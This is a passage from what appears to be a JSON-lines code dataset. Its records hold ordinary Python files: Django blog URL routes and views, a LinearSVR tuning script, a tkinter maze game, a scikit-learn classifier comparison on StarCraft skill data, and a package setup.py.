settings.MEDIA_ROOT}),\n\t(r'^media/admin/(?P.*)$', 'django.views.static.serve', {'document_root': settings.ADMIN_MEDIA_ROOT}),\n (r'^tags/(?P[a-zA-Z0-9_\\-]+)/$', 'blog.views.tags_posts_list'),\n (r'posts/', include('blog.urls')),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"6626393","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 15:06:10 2018\r\n\r\n@author: jschroeder\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom datetime import timedelta\r\n\r\n'''\r\nREAD ME:\r\n \r\nThis file contains the workflow for testing and tuning the models, including\r\nthe final model, Linear SVR.\r\n\r\nThe data for this model was generated on my Macbook Pro using the scripts:\r\n google_trends.py\r\n data_wrangling_enhanced.py\r\n combine_google_demo.py\r\n \r\nWhile working between computers, the filenames and setup may change, but the data\r\nand the project remain the same. \r\n\r\nYou may find the rough draft of my early model testing at regression_selection.py\r\n\r\nThe .csv files included in this directory serve as examples of the data used during\r\nthis project.\r\n full_dataset_bystate.csv - the parsed ASCII demographic file\r\n test_google_bank_account.csv - the parsed Google Trends data\r\n bank_account.csv - the combined file (named final_dataset.csv in the combine script)\r\n\r\n\r\n'''\r\n\r\n\r\n# read in the final dataset produced from combine_google_demo.py\r\ndf = pd.read_csv('C:\\\\Users\\\\jschroeder\\\\Documents\\\\Internal\\\\Training\\\\bank_account.csv', index_col='Year', parse_dates=True)\r\n\r\nyear_set_previous = set(df.index.year)\r\n\r\ndf['bank account previous'] = ''\r\n\r\nfor y in df.index.unique(): \r\n if y.year != 2004:\r\n \r\n if ((y.year - 2001) % 4) == 0:\r\n df['bank account previous'][df.index == y] = df.loc[y - timedelta(days=366), 'bank account']\r\n # print(df.loc[y - timedelta(days=366), 'bank account previous']) \r\n else:\r\n df['bank account previous'][df.index == y] = df.loc[y - timedelta(days=365), 'bank account']\r\n # print(df.loc[y - timedelta(days=365), 'bank account previous'])\r\n\r\ndf = df.loc['2005':, :]\r\n\r\ndf['bank account previous'] = df['bank account previous'].astype('float')\r\n\r\ndf.rename(columns={'bank account' : 'bank account copy'}, inplace=True)\r\n\r\ndf['bank account'] = df['bank account copy']\r\n\r\ndel df['bank account copy']\r\n\r\ndel df['State']\r\n\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\n\r\ntscv = TimeSeriesSplit()\r\nX = df.iloc[:, :-1].as_matrix()\r\ny = df.iloc[:, -1].as_matrix()\r\n\r\n\r\nfor train_index, test_index in tscv.split(X):\r\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import LinearSVR\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# tuning the hyperparameters\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n# credit: https://medium.com/@aneesha/svm-parameter-tuning-in-scikit-learn-using-gridsearchcv-2413c02125a0\r\ndef linearsvr_param_selection(X_train, y_train, pipeline):\r\n param_grid = {\r\n 'linreg__C': np.linspace(0.001, 10, num=100),\r\n 'linreg__loss' : ['epsilon_insensitive', 'squared_epsilon_insensitive'],\r\n 'linreg__fit_intercept' : [True, False]\r\n }\r\n grid_search = GridSearchCV(pipeline, param_grid, cv=tscv)\r\n grid_search.fit(X_train, y_train)\r\n grid_search.best_params_\r\n return grid_search\r\n\r\n\r\n# Setup the pipeline steps: steps\r\nsteps = [('scaler', StandardScaler()),\r\n ('linreg', LinearSVR())]\r\n\r\npipeline = Pipeline(steps)\r\n\r\npipeline.fit(X_train, y_train)\r\n\r\nmodel = linearsvr_param_selection(X_train, y_train, pipeline)\r\n\r\nmodel = model.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\n\r\n# Compute and print R^2 and RMSE\r\n# print(\"Optimal alpha: {}\".format(param_dict['alpha']))\r\nprint(\"R^2: {}\".format(model.score(X_test, y_test)))\r\nprint(\"Mean Squared Error: {}\".format(mean_squared_error(y_test, y_pred)))\r\n\r\nprint(model)\r\n\r\nprint(\"\"\"\r\n \r\n\r\n The coefficients of the features are:\r\n {}\r\n\r\n\"\"\".format(model.estimator.named_steps['linreg'].coef_))\r\n\r\ncoef = model.estimator.named_steps['linreg'].coef_\r\n\r\ncoef_index_sorted = coef.argsort()[-4:-1][::-1]\r\n\r\ncoef_index_sorted_desc = coef.argsort()[:3][::1]\r\n\r\ndemo_dict = {\r\n 0 : '<1', \r\n 1 : '1-4', \r\n 2 : '5-9', \r\n 3 : '10-14', \r\n 4 : '15-19', \r\n 5 : '20-24', \r\n 6 : '25-29', \r\n 7 : '29-34', \r\n 8 : '35-39', \r\n 9 : '40-44',\r\n 10 : '45-49',\r\n 11 : '49-54',\r\n 12 : '55-59',\r\n 13 : '60-64',\r\n 14 : '65-69',\r\n 15 : '70-74',\r\n 16 : '75-79',\r\n 17 : '80-84',\r\n 18 : '85+',\r\n 19 : 'Last Year Keyword Data'\r\n }\r\n\r\ntop_three = []\r\nbottom_three = []\r\n\r\nfor item in coef_index_sorted:\r\n top_three.append(item)\r\n \r\nfor item in coef_index_sorted_desc:\r\n bottom_three.append(item)\r\n\r\n\r\nprint(\"\"\"\r\n \r\n Demographics are sorted into 19 age groups:\r\n 1. <1 11. 45-49\r\n 2. 1-4 12. 49-54 \r\n 3. 5-9 13. 55-59\r\n 4. 10-14 14. 60-64\r\n 5. 15-19 15. 65-69\r\n 6. 20-24 16. 70-74\r\n 7. 25-29 17. 75-79\r\n 8. 29-34 18. 80-84 \r\n 9. 35-39 19. 85+\r\n 10. 40-44 \r\n \r\n \r\n Top 3 positively correlated demographics: \r\n {}, {}, {}\r\n \r\n Bottom 3 negatively correlated demographics:\r\n {}, {}, {}\r\n \r\n \"\"\".format(demo_dict[top_three[0]], \r\n demo_dict[top_three[1]], \r\n demo_dict[top_three[2]], \r\n demo_dict[bottom_three[0]],\r\n demo_dict[bottom_three[1]],\r\n demo_dict[bottom_three[2]]))\r\n\r\nprint(coef_index_sorted)\r\nprint(coef[coef_index_sorted])\r\nprint(coef_index_sorted_desc)\r\nprint(coef[coef_index_sorted_desc])\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"capstone_project/final/Capstone_Final_Project.py","file_name":"Capstone_Final_Project.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"60736561","text":"import tkinter\n\n#input key\nkey = \"\"\nkoff = False\ndef key_down(e):\n global key,koff\n key = e.keysym\n koff = False\n \ndef key_up(e):\n global koff\n koff = True\n \nDIR_UP = 0\nDIR_DOWN = 1\nDIR_LEFT =2\nDIR_RIGHT = 3\n\npen_x = 90\npen_y = 90\n\nmap_data = [\n [0,1,1,1,1,0,0,1,1,1,1,0],\n [0,2,3,3,2,1,1,2,3,3,2,0],\n [0,3,0,0,3,3,3,3,0,0,3,0],\n [0,3,1,1,3,0,0,3,1,1,3,0],\n [0,3,2,2,3,0,0,3,2,2,3,0],\n [0,3,0,0,3,1,1,3,0,0,3,0],\n [0,3,1,1,3,3,3,3,1,1,3,0],\n [0,2,3,3,2,0,0,2,3,3,2,0],\n [0,0,0,0,0,0,0,0,0,0,0,0]\n]\n\n\ndef draw_screen(): #open game monitor\n canvas.delete(\"SCXREEN\")\n for y in range(9):\n for x in range(12):\n canvas.create_image(x*60+30, y*60+30, image=img_bg[map_data[y][x]], tag = \"SCREEN\")\n canvas.create_image(pen_x, pen_y, image=img_pen, tag = \"SCREEN\")\n\n\ndef check_wall(cx, cy, di):#each direction\"s wall is searching\n chk = False\n if di == DIR_UP:\n mx = int(cx/60)\n my = int((cy-60)/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_DOWN:\n mx = int(cx/60)\n my = int((cy+60)/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_LEFT:\n mx = int((cx-60)/60)\n my = int(cy/60)\n if map_data[my][mx] <= 1:\n chk = True\n if di == DIR_RIGHT:\n mx = int((cx+60)/60)\n my = int(cy/60)\n if map_data[my][mx] <= 1:\n chk = True\n return chk\n\n\ndef move_penpen(): #move penpen\n global pen_x, pen_y\n if key == \"Up\":\n if check_wall(pen_x, pen_y, DIR_UP) == False:\n pen_y = pen_y-60\n if key == \"Down\":\n if check_wall(pen_x, pen_y, DIR_DOWN) == False:\n pen_y = pen_y + 60\n if key == \"Left\":\n if check_wall(pen_x, pen_y, DIR_LEFT) == False:\n pen_x = pen_x - 60\n if key == \"Right\":\n if check_wall(pen_x, pen_y, DIR_RIGHT) == False:\n pen_x = pen_x + 60\n \n \ndef main(): #main loop\n global key, koff\n draw_screen()\n move_penpen()\n if koff == True:\n key = \"\"\n koff = False\n root.after(300,main)\n\n\nroot = tkinter.Tk()\n\nimg_bg = [\n tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip00.png\"),\n tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip01.png\"),\n tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip02.png\"),\n tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/chip03.png\")\n]\nimg_pen = tkinter.PhotoImage(file = \"/home/pi/Downloads/py2_samples/Chapter3/image_penpen/pen03.png\")\n\nroot.title(\"HARAHARA penguin rabilince\")\nroot.resizable(False,False)\nroot.bind(\"\", key_down)\nroot.bind(\"\", key_up)\ncanvas = tkinter.Canvas(width=720,height=540)\ncanvas.pack()\nmain()\nroot.mainloop()\n","sub_path":"game_development_tutorial_by_python/list0303_1.py","file_name":"list0303_1.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"280534961","text":"from django.http import HttpResponseForbidden,HttpResponseRedirect,Http404, HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Article,Category,Comment\nfrom django.db.models import Q\nfrom django.views.generic import ListView,DetailView,CreateView,UpdateView,DeleteView,RedirectView\nfrom django.urls import reverse_lazy,reverse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.paginator import Paginator,PageNotAnInteger, EmptyPage\nfrom django.core.exceptions import PermissionDenied\nfrom django.views.generic.edit import FormMixin\nfrom .filters import ArticleFilter, CategoryArticleFilter\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.contrib import messages\n\n\n\nclass article_list(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles'\n paginate_by=15 \n \n\n def get_queryset(self):\n queryset = super(article_list, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset \n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['categories']=Category.objects.all() \n return context\n \n \n\nclass article_detail(FormMixin,LoginRequiredMixin,DetailView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_detail.html'\n context_object_name = 'article'\n form_class=CommentForm\n \n\n\n def get_queryset(self):\n queryset = super(article_detail, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset\n\n\n def get_success_url(self):\n return reverse('articles:detail', kwargs={\"pk\": self.object.pk})\n \n def get_context_data(self, **kwargs):\n context = super(article_detail, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n context['comments'] = self.object.comments.filter()[:15] \n context['tags'] = self.object.tags.similar_objects()[:10]\n context['form']=self.get_form() \n return context\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n form = self.get_form()\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n def form_valid(self, form): \n new_comment = form.save(commit=False)\n new_comment.post = self.get_object()\n new_comment.name=self.request.user\n form.save()\n return super(article_detail,self).form_valid(form)\n \n \nclass article_create(SuccessMessageMixin,LoginRequiredMixin,CreateView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_create.html' \n fields=['title','body','thumb','category','tags']\n success_message='Thank You! Your Post will be published once the Admin has approved it!'\n\n\n\n def get_success_url(self):\n return reverse('articles:list')\n\n def form_valid(self,form):\n form.instance.author=self.request.user\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super(article_create, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n\n\nclass article_edit(SuccessMessageMixin,LoginRequiredMixin,UpdateView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_edit.html'\n fields=['title','body','thumb']\n success_message='Your Article has been edited successfully' \n\n def get_queryset(self):\n queryset = super(article_edit, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset \n\n def dispatch(self, request, *args, **kwargs): # new\n obj = self.get_object()\n if obj.author != self.request.user:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(article_edit, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n\n\nclass article_delete(SuccessMessageMixin,LoginRequiredMixin,DeleteView):\n login_url='/accounts/login/'\n model=Article\n template_name='articles/article_delete.html'\n success_url=reverse_lazy('articles:list')\n\n\n def get_queryset(self):\n queryset = super(article_delete, self).get_queryset()\n queryset = queryset.filter(approved=True)\n return queryset\n\n def dispatch(self, request, *args, **kwargs): # new\n obj = self.get_object()\n if obj.author != self.request.user:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(article_delete, self).get_context_data(**kwargs)\n context['categories']=Category.objects.all()\n return context\n \n\n\nclass categorywise_list(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles' \n paginate_by=15 \n\n def get_queryset(self):\n queryset = super(categorywise_list, self).get_queryset()\n queryset = queryset.filter(approved=True,category_id=self.kwargs['item_id'])\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(categorywise_list, self).get_context_data(**kwargs) \n context['categories']=Category.objects.all()\n return context\n\n\n\ndef about(request):\n categories=Category.objects.all()\n return render(request, 'articles/about.html',{'categories':categories})\n\n@login_required(login_url=\"/accounts/login/\")\ndef comment_delete(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n article=comment.post \n if comment.name==request.user: \n comment.delete()\n return HttpResponseRedirect(reverse('articles:detail', kwargs={'pk':article.pk}))\n else:\n return HttpResponse('

    Invalid Request

    ')\n \n return render(request,'articles/article_detail')\n\n\ndef article_search(request):\n query=request.GET.get('q')\n results = Article.objects.filter(Q(title__icontains=query) | Q(body__icontains=query) | Q(category__categorize__icontains=query) | Q(author__username__icontains=query))\n categories = Category.objects.all() \n messages.success(request, 'Total Results found :') \n paginator=Paginator(results,15)\n page = request.GET.get('page')\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer deliver the first page\n articles = paginator.page(1)\n except EmptyPage:\n # If page is out of range deliver last page of results\n articles = paginator.page(paginator.num_pages)\n return render(request, 'articles/article_search.html', { 'articles': articles , 'categories':categories ,'query':query, 'results':results } )\n\n\nclass article_like_toggle(LoginRequiredMixin,RedirectView):\n login_url='/accounts/login/'\n def get_redirect_url(self, *args, **kwargs):\n pk=self.kwargs.get('pk') \n obj=get_object_or_404(Article,pk=pk)\n print(obj.title)\n url_ = obj.get_absolute_url()\n user = self.request.user \n if user in obj.likes.all():\n obj.likes.remove(user)\n else:\n obj.likes.add(user)\n return url_\n\n\n\nclass article_like_api_toggle(APIView): \n authentication_classes = [authentication.SessionAuthentication,]\n permission_classes = [permissions.IsAuthenticated,]\n\n def get(self, request,pk=None, format=None): \n \n obj=get_object_or_404(Article,pk=pk)\n \n url_ = obj.get_absolute_url()\n user = self.request.user\n updated = False\n liked = False\n\n if user in obj.likes.all():\n liked=False\n obj.likes.remove(user)\n else:\n liked=True\n obj.likes.add(user)\n updated=True \n data = {\n \"updated\":updated, \"liked\":liked\n } \n \n return Response(data)\n\nclass sort_by_like(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles'\n paginate_by=15\n\n def get_queryset(self):\n queryset = super(sort_by_like, self).get_queryset()\n queryset = queryset.annotate(like_count=Count('likes')).order_by('-like_count')\n queryset = queryset.filter(approved=True)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) \n context['categories']=Category.objects.all() \n return context\n\n\n\nclass sort_by_date(ListView):\n model = Article\n template_name='articles/article_list.html'\n context_object_name = 'articles'\n paginate_by=15\n\n def get_queryset(self):\n queryset = super(sort_by_date, self).get_queryset()\n queryset = queryset.filter(approved=True).order_by('date') \n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) \n context['categories']=Category.objects.all() \n return context\n\n\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"595807435","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier\nfrom sklearn.naive_bayes import BernoulliNB, GaussianNB, MultinomialNB\nfrom sklearn.neural_network import BernoulliRBM, MLPClassifier, MLPRegressor\nfrom sklearn.exceptions import UndefinedMetricWarning\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nimport sys\nfrom sklearn.model_selection import train_test_split, cross_val_score\nimport numpy as np\nimport warnings\nfrom functools import reduce\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\n\n\nclass LastUpdatedOrderedDict(OrderedDict):\n \"Store items in the order the keys were last added.\"\n\n def __setitem__(self, key, value):\n if key in self:\n del self[key]\n OrderedDict.__setitem__(self, key, value)\n\n\n# GLOBALS\nLOGGING = True # verbose logging output\nSPLIT_DATA = 0.2 # split dataset into training and testdata\nDATAFRAME = None # our dataframe\nMISSING_VALUES = 'delete' # how to deal with missing values (delete, mean, median, most_frequent)\nSIGNIFICANT_COLS = False # significant columns only (like APM, PACs, #Hotkeys)\nNUMBER_OF_RUNS = 10\nEXPORT_PLOT = False\nX_LABEL = 'hidden layer sizes'\nPLOT_FILE_NAME = 'figures/neural_network_2.png'\n\n# change the classifier values here!\nALGORITHMS = ['bayes'] #algorithms to use ['forest', 'knn', 'bayes', 'neural']\nalgorithmParameter = (5, 5+1, 5) # set a parameter in range(start, end, jump)\n\n# forest params (algorithmParameter controls n_estimators)\nforestCriterion = 'gini' # \"gini\" (default) for the Gini impurity 2) \"entropy\" for the information gain.\nforestMaxDepth = None # how deep can a tree be max; default: none\n\n# knn params (algorithmParameter control n_neighbors)\nknnWeights = 'uniform' # weights: 1) 'uniform' (default): weighted equally. 2) 'distance': closer neighbors => more influence\nknnAlgorithm = 'brute' # algorithm to compute the NN: {'ball_tree', 'kd_tree', 'brute', 'auto}\n\n# bayes params TODO\n\n# neural MLP params (algorithmParameter controls hidden_layer_sizes, default: (100,))\nneuralActivation = 'relu' # (activation function for the hidden layer) : {‘identity’, ‘logistic’, ‘tanh’, ‘relu’}, default ‘relu’\nneuralSolver = 'adam' # (for the weight optimization): {‘lbfgs’, ‘sgd’, ‘adam’}, default ‘adam’\nneuralLearningRate = 'constant'# (Learning rate schedule for weight updates).: {‘constant’, ‘invscaling’, ‘adaptive’}, default ‘constant’\nneuralMaxIter = 200 # max_iter : int, optional, default 200\n\n# filter warnings of the type UndefinedMetricWarning\nwarnings.filterwarnings(\"ignore\", category=UndefinedMetricWarning)\n\ndef main():\n readDataset()\n handleMissingValues()\n classifiers = getClassifiers()\n trainAndPredict(classifiers)\n\n\ndef readDataset():\n global DATAFRAME\n # csv => DataFrame\n DATAFRAME = pd.read_csv('datasets/SkillCraft1_Dataset.csv')\n printlog('dataset size:' + str(DATAFRAME.shape))\n\n\ndef handleMissingValues():\n global DATAFRAME\n if (MISSING_VALUES == 'delete'):\n # filter out missing values\n # https://stackoverflow.com/questions/27428954/drop-row-if-any-column-value-does-not-a-obey-a-condition-in-pandas\n DATAFRAME = DATAFRAME[~(DATAFRAME == '?').any(1)]\n\n if (MISSING_VALUES == 'median' or MISSING_VALUES == 'mean' or MISSING_VALUES == 'most_frequent'):\n # deal with missing values => mean\n DATAFRAME.replace({'?': np.nan}, inplace=True)\n fill_NaN = preprocessing.Imputer(missing_values='NaN', strategy=MISSING_VALUES, axis=0)\n imputed_DF = pd.DataFrame(fill_NaN.fit_transform(DATAFRAME))\n imputed_DF.columns = DATAFRAME.columns\n imputed_DF.index = DATAFRAME.index\n DATAFRAME = imputed_DF\n printlog('dataset size after handling missing values:' + str(DATAFRAME.shape))\n\n\ndef trainAndPredict(classifiers):\n resultsPerClassifier = LastUpdatedOrderedDict()\n for (model, name) in classifiers:\n resultsPerClassifier[name] = []\n for i in range (0, NUMBER_OF_RUNS):\n # split into 80% training data, 20% test data\n train, test = train_test_split(DATAFRAME, test_size=SPLIT_DATA)\n\n # get training & test samples/targets\n training_samples, training_target = getSamplesAndTargets(train)\n test_samples, actual_leagues = getSamplesAndTargets(test)\n\n for (model, name) in classifiers:\n # for each classifier, do the training and evaluation\n model.fit(training_samples, training_target)\n\n # predict the samples\n predicted_leagues = model.predict(test_samples)\n\n # perform cross validation\n X, y = getSamplesAndTargets(DATAFRAME)\n crossScoresPrecision = cross_val_score(model, X, y, cv=10, scoring='recall_weighted')\n crossScoresRecall = cross_val_score(model, X, y, cv=10, scoring='precision_weighted')\n crossScoresF1 = cross_val_score(model, X, y, cv=10, scoring='f1_weighted')\n crossScoresAccuracy = cross_val_score(model, X, y, cv=10, scoring='accuracy')\n\n # summarize the fit of the model\n crossScoresMean = (crossScoresPrecision.mean(), crossScoresRecall.mean(), crossScoresF1.mean(), crossScoresAccuracy.mean())\n crossScoresStd = (crossScoresPrecision.std() * 2, crossScoresRecall.std() * 2, crossScoresF1.std() * 2, crossScoresAccuracy.std() * 2)\n printResults(crossScoresMean, crossScoresStd, actual_leagues, predicted_leagues, name)\n resultsPerClassifier[name].append(\n crossScoresMean)\n #(metrics.precision_recall_fscore_support(actual_leagues, predicted_leagues, average='weighted'))\n\n printClassifierReport(resultsPerClassifier)\n if EXPORT_PLOT:\n printPlot(resultsPerClassifier)\n\n\ndef getClassifiers():\n # add the various classifiers\n classifiers = []\n for i in range(*algorithmParameter):\n if \"forest\" in ALGORITHMS:\n name = \"Random Forests (n={0})\".format(i)\n classifiers.append(\n # n_estimators: number of trees in the forest, default: 10\n # criterion: 1) \"gini\" (default) for the Gini impurity 2) \"entropy\" for the information gain.\n # max_depth: how deep can a tree be max; default: none\n (RandomForestClassifier(n_estimators=i, criterion=forestCriterion, max_depth=forestMaxDepth), name))\n if \"knn\" in ALGORITHMS:\n name = \"kNN (n={0})\".format(i)\n classifiers.append(\n # n_neighbors: number of neighbours to use, default: 5\n # weights: 1) 'uniform' (default): weighted equally. 2) 'distance': closer neighbors => more influence\n # algorithm to compute the NN: 1) 'ball_tree' will use BallTree 2) 'kd_tree' will use KDTree\n (KNeighborsClassifier(n_neighbors=i, weights=knnWeights, algorithm=knnAlgorithm), name))\n if \"bayes\" in ALGORITHMS:\n name = \"Naive Bayes (priors={0})\".format('None')\n classifiers.append(\n # priors: prior probabilities of the classes; default: 'none'\n (GaussianNB(priors=None), name))\n if \"neural\" in ALGORITHMS:\n name = \"Neural Network (layers={0})\".format(i)\n classifiers.append(\n # hidden_layer_sizes (ith element = number of neurons in the ith hidden layer), default: (100,)\n # activation (activation function for the hidden layer) : {‘identity’, ‘logistic’, ‘tanh’, ‘relu’}, default ‘relu’\n # solver (for the weight optimization): {‘lbfgs’, ‘sgd’, ‘adam’}, default ‘adam’\n # learning_rate (Learning rate schedule for weight updates).: {‘constant’, ‘invscaling’, ‘adaptive’}, default ‘constant’\n # max_iter : int, optional, default 200\n (MLPClassifier(hidden_layer_sizes=(i, ), activation=neuralActivation, solver=neuralSolver,\n learning_rate=neuralLearningRate, max_iter=neuralMaxIter), name))\n return classifiers\n\ndef getSamplesAndTargets(data):\n if (SIGNIFICANT_COLS):\n # select only some of the most significant columns\n samples = data[['NumberOfPACs','ActionLatency','SelectByHotkeys','AssignToHotkeys', 'APM']]\n else:\n # get training samples (without LeagueIndex and GameID\n samples = data.drop(['GameID', 'LeagueIndex'], axis=1)\n\n # get training target (LeagueIndex)\n targets = data['LeagueIndex'].values\n return samples, targets\n\n\ndef printResults(crossScoresMean, crossScoresStd, actual_leagues, predicted_leagues, classifier):\n print(\"\\n\", \"=\" * 80, \"\\n\")\n print(\"=== Classifier:\", classifier, \"===\\n\")\n print(\"=== Classification Report: ===\\n\"\n \"precision (How many selected elements are relevant?): TP / (TP + FP)\\n\"\n \"recall (How many relevant elements are selected?): TP / (TP + FN)\\n\"\n \"f1 score to measure a test's accuracy (considers both precision and recall): 2*((PR * RC)/(PR + RC))\\n\"\n \"support: #elements in this class\\n\", metrics.classification_report(actual_leagues, predicted_leagues))\n print(\"=== Cross Validation Results: ===\\n\",\n \"Precision: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[0], crossScoresStd[0]),\n \"Recall: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[1], crossScoresStd[1]),\n \"F1 Score: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[2], crossScoresStd[2]),\n \"Accuracy: %0.2f (+/- %0.2f)\\n\" % (crossScoresMean[3], crossScoresStd[3]))\n print(\"=== Confusion Matrix: ===\\n\"\n \"top: predicted values, left: actual values\\n\",\n metrics.confusion_matrix(actual_leagues, predicted_leagues))\n print()\n # here we can use 'weighted' or 'macro' => weighted adjusts for the number of instances per label\n # print(\"f1-score: %0.2f\" % metrics.f1_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"recall-score: %0.2f\" % metrics.recall_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"precision-score: %0.2f\" % metrics.precision_score(actual_leagues, predicted_leagues, average='weighted'))\n # print(\"accuracy-score: %0.2f\" % metrics.accuracy_score(actual_leagues, predicted_leagues))\n\n\ndef printClassifierReport(resultsPerClassifier):\n print()\n print(\"=\" * 80)\n print(\"=== Report per Classifier: ===\")\n printlog(resultsPerClassifier)\n resultFormat = '({:0.2f}, {:0.2f}, {:0.2f})'\n for name, results in resultsPerClassifier.items():\n print(\"=== %s ===\" % name)\n # determine the best / worst result based on f1-score\n bestRow = reduce((lambda x, y: x if x[2] > y[2] else y), results)[:-1]\n print(\"best (P, R, F): \", resultFormat.format(*bestRow))\n worstRow = reduce((lambda x, y: x if x[2] < y[2] else y), results)[:-1]\n print(\"worst (P, R, F): \", resultFormat.format(*worstRow))\n # calculate the average result.\n summedRows = results[0][:-1] if len(results) == 1 else reduce((lambda x, y: (x[0] + y[0], x[1] + y[1], x[2] + y[2])), results)\n averageRow = list(map((lambda x: x / NUMBER_OF_RUNS), summedRows))\n print(\"average (P, R, F): \", resultFormat.format(*averageRow))\n\n\ndef printPlot(resultsPerClassifier):\n precision = [results[0][0] for name, results in resultsPerClassifier.items()]\n recall = [results[0][1] for name, results in resultsPerClassifier.items()]\n f1Score = [results[0][2] for name, results in resultsPerClassifier.items()]\n xAxis = list(range(*algorithmParameter))\n printlog(list(range(*algorithmParameter)))\n printlog(precision)\n printlog(recall)\n printlog(f1Score)\n\n fig = plt.figure(figsize=(8, 8))\n precisionLine, = plt.plot(xAxis, precision, label='Precision')\n recallLine, = plt.plot(xAxis, recall, label='Recall')\n f1ScoreLine, = plt.plot(xAxis, f1Score, label='F1 Score')\n plt.legend(handles=[precisionLine, recallLine, f1ScoreLine])\n plt.ylabel('performance')\n plt.xlabel(X_LABEL)\n #plt.show()\n plt.savefig(PLOT_FILE_NAME)\n plt.close(fig)\n\n\ndef printlog(message):\n if (LOGGING):\n print(message)\n\n\nif __name__ == '__main__':\n exit = main()\n sys.exit(exit)\n","sub_path":"sc2.py","file_name":"sc2.py","file_ext":"py","file_size_in_byte":12464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"447165208","text":"import os\nfrom setuptools import setup, find_packages\n\ndirectory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"fitness_tracker\",\n version=\"1.0.1\",\n author=\"Jurica Runtas, Kristijan Milić\",\n url=\"https://github.com/JuricaRT/fitness_tracker\",\n license=\"MIT\",\n description=\"Fitness Tracker is a tool that offers a better way of tracking your fitness progress.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n classifiers=[\"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"],\n install_requires=[\"PyQt5\", \"requests\", \"psycopg2\",\n \"matplotlib\", \"numpy\"],\n python_requires=\">=3.6\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"628570896","text":"#!/usr/bin/env 